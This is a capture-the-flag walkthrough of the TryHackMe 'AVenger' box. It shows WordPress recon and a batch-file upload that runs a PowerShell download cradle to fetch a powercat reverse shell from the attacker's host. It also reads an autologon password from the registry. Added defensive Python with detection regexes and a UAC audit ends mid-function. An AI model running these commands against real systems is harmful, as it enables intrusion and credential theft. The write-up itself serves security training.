AVenger

Recon

We start with a simple Nmap scan of all TCP ports and discover several open ports and the services running on them. Notable services are HTTP on port 80, HTTPS on port 443, SMB on port 445, RDP on port 3389 and WinRM on port 5985.

┌──(kali㉿kali)-[~/THM/AVenger]
└─$ nmap -p- 10.10.10.22 -v -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-01 01:27 EST
Initiating Ping Scan at 01:27
Completed Connect Scan at 01:34, 437.04s elapsed (65535 total ports)
Nmap scan report for 10.10.10.22
Host is up (0.15s latency).
Not shown: 65476 closed tcp ports (conn-refused)
PORT      STATE    SERVICE                                                                                                                                                                                                                  
80/tcp    open     http
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
443/tcp   open     https
445/tcp   open     microsoft-ds
921/tcp   filtered unknown
3306/tcp  open     mysql
3389/tcp  open     ms-wbt-server
5985/tcp  open     wsman
6053/tcp  filtered x11
7680/tcp  open     pando-pub
38865/tcp filtered secrmmsafecopya
47001/tcp open     winrm

For more detail, we run a second scan with version detection and the default script set (-A) against the ports found in the first scan.

┌──(kali㉿kali)-[~/THM/AVenger]
└─$ nmap -p 80,135,139,443,445,921,3306,3389,5985,6053,7680,38865,47001 -A avenger.thm -v 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-01 01:39 EST
                                                                                                                                                                                                   
Nmap scan report for avenger.thm (10.10.10.22)
Host is up (0.16s latency).

PORT      STATE  SERVICE         VERSION  
80/tcp    open   http            Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.5K  2022-06-15 16:07  applications.html
| 177   2022-06-15 16:07  bitnami.css
| -     2023-04-06 09:24  dashboard/
| 30K   2015-07-16 15:32  favicon.ico
| -     2023-06-27 09:26  gift/
| -     2023-06-27 09:04  img/
| 751   2022-06-15 16:07  img/module_table_bottom.png
| 337   2022-06-15 16:07  img/module_table_top.png
| -     2023-06-28 14:39  xampp/
|_
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28

443/tcp   open   ssl/http        Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.5K  2022-06-15 16:07  applications.html
| 177   2022-06-15 16:07  bitnami.css
| -     2023-04-06 09:24  dashboard/
| 30K   2015-07-16 15:32  favicon.ico
| -     2023-06-27 09:26  gift/
| -     2023-06-27 09:04  img/
| 751   2022-06-15 16:07  img/module_table_bottom.png
| 337   2022-06-15 16:07  img/module_table_top.png
| -     2023-06-28 14:39  xampp/
|_
|_ssl-date: TLS randomness does not represent time
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-title: Index of /
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:   a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE

3306/tcp  open   mysql           MySQL 5.5.5-10.4.28-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.28-MariaDB
|   Thread ID: 14
|   Capabilities flags: 63486
|   Some Capabilities: SupportsCompression, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, InteractiveClient, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, ODBCClient, Support41Auth, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: 4XB}q>#2qe%%+HgQ=|{r
|_  Auth Plugin Name: mysql_native_password

3389/tcp  open   ms-wbt-server   Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: GIFT
|   NetBIOS_Domain_Name: GIFT
|   NetBIOS_Computer_Name: GIFT
|   DNS_Domain_Name: gift
|   DNS_Computer_Name: gift
|   Product_Version: 10.0.17763
|_  System_Time: 2023-12-01T06:39:46+00:00
| ssl-cert: Subject: commonName=gift
| Issuer: commonName=gift
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-11-30T06:23:38
| Not valid after:  2024-05-31T06:23:38
| MD5:   abda:da8b:9674:a0b8:0fca:21c1:5205:4867
|_SHA-1: 17d7:06a7:8f1f:fc21:416d:e372:db8b:6822:8854:7aa9
|_ssl-date: 2023-12-01T06:39:57+00:00; -1s from scanner time.

5985/tcp  open   http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6053/tcp  closed x11
7680/tcp  closed pando-pub
38865/tcp closed secrmmsafecopya
47001/tcp open   http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Hosts: localhost, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows


135/tcp   open   msrpc           Microsoft Windows RPC
139/tcp   open   netbios-ssn     Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds?

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2023-12-01T06:39:49
|_  start_date: N/A
                                                                                                                                                                                                  
921/tcp   closed unknown

NSE: Script Post-scanning.
Initiating NSE at 01:40
Completed NSE at 01:40, 0.00s elapsed
Initiating NSE at 01:40
Completed NSE at 01:40, 0.00s elapsed
Initiating NSE at 01:40
Completed NSE at 01:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.49 seconds

Once the Nmap scan completes, we run a Gobuster scan to enumerate the directories served by the web server.

┌──(kali㉿kali)-[~/THM/AVenger]
└─$ gobuster dir -u http://avenger.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://avenger.thm
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 333] [--> http://avenger.thm/img/]
/wordpress            (Status: 301) [Size: 339] [--> http://avenger.thm/wordpress/]
/examples             (Status: 503) [Size: 401]
/licenses             (Status: 403) [Size: 420]
/gift                 (Status: 301) [Size: 334] [--> http://avenger.thm/gift/]
/dashboard            (Status: 301) [Size: 339] [--> http://avenger.thm/dashboard/]
/%20                  (Status: 403) [Size: 301]
/IMG                  (Status: 301) [Size: 333] [--> http://avenger.thm/IMG/]
/*checkout*           (Status: 403) [Size: 301]
/Img                  (Status: 301) [Size: 333] [--> http://avenger.thm/Img/]
/phpmyadmin           (Status: 403) [Size: 301]
/webalizer            (Status: 403) [Size: 420]
/*docroot*            (Status: 403) [Size: 301]
/*                    (Status: 403) [Size: 301]
/con                  (Status: 403) [Size: 301]
/Dashboard            (Status: 301) [Size: 339] [--> http://avenger.thm/Dashboard/]
/http%3A              (Status: 403) [Size: 301]
/**http%3a            (Status: 403) [Size: 301]
/*http%3A             (Status: 403) [Size: 301]
/xampp                (Status: 301) [Size: 335] [--> http://avenger.thm/xampp/]
/aux                  (Status: 403) [Size: 301]
/**http%3A            (Status: 403) [Size: 301]
/Gift                 (Status: 301) [Size: 334] [--> http://avenger.thm/Gift/]
/%C0                  (Status: 403) [Size: 301]
/server-status        (Status: 403) [Size: 420]
/%3FRID%3D2671        (Status: 403) [Size: 301]
/devinmoore*          (Status: 403) [Size: 301]
/200109*              (Status: 403) [Size: 301]
.
.
.
/login%3f             (Status: 403) [Size: 301]
/%22julie%20roehm%22  (Status: 403) [Size: 301]
/%22james%20kim%22    (Status: 403) [Size: 301]
/%22britney%20spears%22 (Status: 403) [Size: 301]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

We can see a few services running, such as WordPress. Manual enumeration of /wordpress led to the page below.

Every link on /wordpress redirects to avenger.tryhackme/gift; opening http://avenger.thm/gift manually does the same.

We add this hostname to /etc/hosts as well.

A wpscan of http://avenger.thm/wordpress/ did not reveal much, but a scan of http://avenger.tryhackme/gift/ revealed the following.

┌──(kali㉿kali)-[~]
└─$ wpscan --api-token [REDACTED] --url http://avenger.tryhackme/gift/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://avenger.tryhackme/gift/ [10.10.10.22]
[+] Started: Fri Dec  1 04:23:06 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
 |  - X-Powered-By: PHP/8.0.28
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://avenger.tryhackme/gift/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://avenger.tryhackme/gift/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://avenger.tryhackme/gift/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://avenger.tryhackme/gift/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.2.2 identified (Insecure, released on 2023-05-20).
 | Found By: Rss Generator (Passive Detection)
 |  - http://avenger.tryhackme/gift/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>
 |  - http://avenger.tryhackme/gift/comments/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>
 |
 | [!] 6 vulnerabilities identified:
 |
 | [!] Title: WP 5.6-6.3.1 - Contributor+ Stored XSS via Navigation Block
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/cd130bb3-8d04-4375-a89a-883af131ed3a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38000
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561
 |      - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/

[+] WordPress theme in use: astra
 | Location: http://avenger.tryhackme/gift/wp-content/themes/astra/
 | Last Updated: 2023-11-21T00:00:00.000Z
 | Readme: http://avenger.tryhackme/gift/wp-content/themes/astra/readme.txt
 | [!] The version is out of date, the latest version is 4.5.1
 | Style URL: http://avenger.tryhackme/gift/wp-content/themes/astra/style.css
 | Style Name: Astra
 | Style URI: https://wpastra.com/
 | Description: Astra is fast, fully customizable & beautiful WordPress theme suitable for blog, personal portfolio,...
 | Author: Brainstorm Force
 | Author URI: https://wpastra.com/about/?utm_source=theme_preview&utm_medium=author_link&utm_campaign=astra_theme
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 4.1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/themes/astra/style.css, Match: 'Version: 4.1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] forminator
 | Location: http://avenger.tryhackme/gift/wp-content/plugins/forminator/
 | Last Updated: 2023-11-13T09:11:00.000Z
 | [!] The version is out of date, the latest version is 1.28.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: Forminator < 1.24.4 - Reflected XSS
 |     Fixed in: 1.24.4
 |     References:
 |      - https://wpscan.com/vulnerability/6d50d3cc-7563-42c4-977b-f834fee711da
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3134
 |      - https://www.onvio.nl/nieuws/research-day-discovering-vulnerabilities-in-wordpress-plugins
 |
 | [!] Title: Forminator < 1.25.0 - Unauthenticated Arbitrary File Upload
 |     Fixed in: 1.25.0
 |     References:
 |      - https://wpscan.com/vulnerability/fb8db268-77d9-47b5-ad41-e9c05f0e7523
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4596
 |      - https://www.exploit-db.com/exploits/51664/
 |
 | [!] Title: Forminator and Forminator Pro < 1.27.0 - Admin+ Stored Cross-Site Scripting
 |     Fixed in: 1.27.0
 |     References:
 |      - https://wpscan.com/vulnerability/229207bb-8f8d-4579-a8e2-54516474ccb4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5119
 |
 | [!] Title: Forminator < 1.28.0 - Admin+ Arbitrary File Upload
 |     Fixed in: 1.28.0
 |     References:
 |      - https://wpscan.com/vulnerability/7d1ead56-7db2-46c4-97ed-af008e9b5515
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6133
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/13cfa202-ab90-46c0-ab53-00995bfdcaa3
 |
 | Version: 1.24.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt

[+] ultimate-addons-for-gutenberg
 | Location: http://avenger.tryhackme/gift/wp-content/plugins/ultimate-addons-for-gutenberg/
 | Last Updated: 2023-11-30T14:51:00.000Z
 | [!] The version is out of date, the latest version is 2.10.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 2.6.9 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:01:09 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:01:09

[i] No Config Backups Found.

[+] Finished: Fri Dec  1 04:24:49 2023
[+] Requests Done: 179
[+] Cached Requests: 6
[+] Data Sent: 49.125 KB
[+] Data Received: 975.477 KB
[+] Memory used: 256.109 MB
[+] Elapsed time: 00:01:42

We see that Forminator version 1.24.1 is in use, which is affected by the unauthenticated remote command execution vulnerability in version 1.24.6 (CVE-2023-4596). This vulnerability would allow us to upload a reverse shell, execute it and gain access.

Further manual enumeration of http://avenger.tryhackme/gift/ reveals, at the bottom of the page, a form with a file upload field. This is where the vulnerability can be exploited.


Initial Access

First I tried uploading a reverse shell and accessing it, but it was not available: I could not find the uploaded file. When we upload a file and submit the form, we get a message that states "Thank you for your submission. Our team is delighted to review every message carefully. You will hear from us shortly!"

We can create an HTML file containing an img tag whose source points at our IP address. If we receive any request, the file is definitely being opened.

To test this:

echo '<img src="http://IP_ADDRESS/">' > cat.html

We upload the file cat.html and set up an HTTP server with Python; after some time we get a request.

└─$ python3 -m http.server 80                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [01/Dec/2023 04:50:23] "GET / HTTP/1.1" 200 -

This is confirmation that the file is being opened. Now we just need to upload a malicious file that can give us a reverse shell.

I was lucky enough to get it on the first try with a batch file. Batch files are essentially text files containing a set of commands that are executed when the file is run.

We create a simple one on the same principle as the HTML file, to check whether we get a request back.

echo 'curl http://IP_ADDRESS/cats' > test.bat

I initially messed up this command with the wrong IP and it did not work; after quite some time I realised I had entered the wrong IP, and then it worked.

└─$ python3 -m http.server 80                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [01/Dec/2023 04:56:19] code 404, message File not found
10.10.10.22 - - [01/Dec/2023 04:56:19] "GET /cats HTTP/1.1" 404 -

This confirms that we have command execution. Now we need to generate and upload a PowerShell reverse shell.

This can be done with the help of powercat.

└─$ powercat -c IP_ADDRESS -p 443 -e cmd -g > cat.ps1

We need to modify our batch file to give us a reverse shell.

echo "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://[REDACTED]/cat.ps1')" > cats.bat

We then upload this and set up a listener for our reverse shell.

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [01/Dec/2023 04:58:19] "GET /cat.ps1 HTTP/1.1" 200 -


┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 443      
listening on [any] 443 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.10.22] 50600
Microsoft Windows [Version 10.0.17763.4499]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami

gift\hugo

Our PowerShell reverse shell works, and we immediately get a shell as the user hugo.
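From the defender's side, the chain used here (a batch file dropped into the upload directory that launches a PowerShell download cradle) is easy to spot in process-creation telemetry. The following Python is an added example, not part of the original writeup: it runs three regex rules over hand-constructed Sysmon-style events (the upload path under htdocs and the base64 blob are assumptions, not taken from the box) and generalises beyond the page's plain-text cradle to also flag -EncodedCommand launches.

```python
import re
from typing import Dict, List, Tuple

# Detection rules, keyed by name, applied to a process-creation command line.
RULES: Dict[str, re.Pattern] = {
    # powershell -c IEX (New-Object Net.WebClient).DownloadString('http://...')
    # in either order: "IEX ... DownloadString" or "DownloadString(...) | IEX"
    "powershell_download_cradle": re.compile(
        r"(?i)(?:\b(?:IEX|Invoke-Expression)\b.*\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b"
        r"|\b(?:DownloadString|DownloadFile)\b.*\|\s*(?:IEX|Invoke-Expression)\b)"
    ),
    # A script executed straight out of a web-served upload location
    # (the htdocs / wp-content/uploads path is an assumption for this example).
    "script_run_from_upload_dir": re.compile(
        r"(?i)[\\/](?:wp-content[\\/]uploads|htdocs)[\w\\/.\-]*\.(?:bat|cmd|ps1|vbs|js)\b"
    ),
    # powershell -enc <base64>: the page's cradle was plain text, but the same
    # download-and-execute step is frequently hidden behind an encoded command.
    "powershell_encoded_command": re.compile(
        r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}"
    ),
}


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule whose regex matches the event's command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def scan_events(events: List[Dict[str, str]]) -> List[Tuple[int, str, List[str]]]:
    """Run every rule over a list of events; return (index, image, rules) for hits only."""
    findings = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            findings.append((i, ev.get("Image", ""), hits))
    return findings


def build_sample_events() -> List[Dict[str, str]]:
    """Hand-constructed Sysmon Event ID 1 style records (not captured from the box).

    Events 0-2 model the writeup's batch file, its download cradle, and an encoded
    variant; events 3-4 are benign admin activity that must not fire."""
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    cmd = r"C:\Windows\System32\cmd.exe"
    return [
        {"Image": cmd, "ParentImage": r"C:\Windows\explorer.exe",
         "CommandLine": r'C:\Windows\system32\cmd.exe /c "C:\xampp\htdocs\gift\wp-content\uploads\forminator\cats.bat"'},
        {"Image": ps, "ParentImage": cmd,
         "CommandLine": "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://10.17.15.155/cat.ps1')"},
        {"Image": ps, "ParentImage": cmd,
         "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMA"},
        {"Image": ps, "ParentImage": r"C:\Windows\System32\svchost.exe",
         "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
        {"Image": cmd, "ParentImage": r"C:\Windows\explorer.exe",
         "CommandLine": r"cmd.exe /c dir C:\xampp\htdocs"},
    ]


if __name__ == "__main__":
    for idx, image, rules in scan_events(build_sample_events()):
        print(f"event {idx}: {image} -> {', '.join(rules)}")
```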

After that we can look at hugo's desktop for our first flag.

C:\Users>cd hugo
cd hugo

C:\Users\hugo>cd desktop
cd desktop

C:\Users\hugo\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\hugo\Desktop

07/10/2023  09:40 PM    <DIR>          .
07/10/2023  09:40 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
07/25/2023  02:14 PM                48 user.txt
               3 File(s)          1,129 bytes
               2 Dir(s)  10,822,037,504 bytes free

C:\Users\hugo\Desktop>type user.txt
type user.txt
[FIRST_FLAG]
C:\Users\hugo\Desktop>

Privilege Escalation

We first check which groups our user hugo belongs to.

C:\Users\hugo\Desktop>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Remote Desktop Users                                  Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users                               Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192

We can see we are a member of Administrators, so let's try changing into the Administrator directory.

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users

06/30/2023  07:52 AM    <DIR>          .
06/30/2023  07:52 AM    <DIR>          ..
08/18/2023  12:53 PM    <DIR>          Administrator
11/25/2023  12:15 AM    <DIR>          hugo
12/12/2018  07:45 AM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  10,822,209,536 bytes free

C:\Users>cd Administrator
cd Administrator

Access is denied.

However, we get Access is denied. It is possible that UAC (User Account Control) is preventing us from performing administrative tasks; we can check whether UAC is enabled with this command:

C:\Users>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1

We get 0x1, which means UAC is enabled. We also saw that we are in the Mandatory Label\Medium Mandatory Level group, so our shell runs at medium integrity; UAC strips the Administrators membership from that token (shown as "Group used for deny only" in the whoami /groups output), which is why administrative tasks are denied.

If we know hugo's password, we can connect via RDP and simply get access.

One common place to look for credentials is autologon, a feature that lets a user configure the system to log in to a specific account automatically, without entering the username and password manually.

The saved credentials live under the HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon registry key.

C:\Users\hugo\Desktop>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    .
    .
    .
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    hugo
    DefaultPassword    REG_SZ    [REDACTED]
    AutoLogonSID    REG_SZ    S-1-5-21-1966530601-3185510712-10604624-1008
    LastUsedUsername    REG_SZ    hugo
    ShellAppRuntime    REG_SZ    ShellAppRuntime.exe

Here we have hugo's password.
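The two registry checks used in this section (EnableLUA under Policies\System, and AutoAdminLogon with DefaultPassword under Winlogon) are exactly what a defender should audit on a host like this. The following Python is an added example, not part of the original writeup: it parses the text format that `reg query` prints and reports weak settings without echoing any password. The sample key dumps are constructed from the page's output with a made-up password, and LocalAccountTokenFilterPolicy and ConsentPromptBehaviorAdmin are extra UAC values it checks that the page does not mention.

```python
import re
from typing import Dict, List, Tuple

RegValues = Dict[str, Tuple[str, str]]  # value name -> (REG_type, data)
Finding = Tuple[str, str]               # (finding id, message)

# One indented value line of `reg query` output: "    Name    REG_TYPE    data".
# Value names that contain spaces are not handled by this deliberately simple parser.
VALUE_LINE_RE = re.compile(r"^\s{2,}(\S+)\s+(REG_[A-Z_]+)\s*(.*)$")


def parse_reg_query(text: str) -> RegValues:
    """Turn `reg query` text output into {value_name: (reg_type, data)}."""
    values: RegValues = {}
    for line in text.splitlines():
        m = VALUE_LINE_RE.match(line)
        if m:
            name, rtype, data = m.groups()
            values[name] = (rtype, data.strip())
    return values


def dword(values: RegValues, name: str, default: int) -> int:
    """Read a REG_DWORD printed as '0x1' as an int; a missing value means the OS default."""
    entry = values.get(name)
    return default if entry is None else int(entry[1], 0)


def audit_uac(values: RegValues) -> List[Finding]:
    """Findings for the Policies/System key. Defaults: EnableLUA=1, filter on, prompt=5."""
    findings: List[Finding] = []
    if dword(values, "EnableLUA", 1) == 0:
        findings.append(("uac_disabled",
                         "EnableLUA=0: UAC is off, every admin logon gets an unfiltered token"))
    if dword(values, "LocalAccountTokenFilterPolicy", 0) == 1:
        findings.append(("remote_token_filter_off",
                         "LocalAccountTokenFilterPolicy=1: network logons by local admins are not filtered"))
    if dword(values, "ConsentPromptBehaviorAdmin", 5) == 0:
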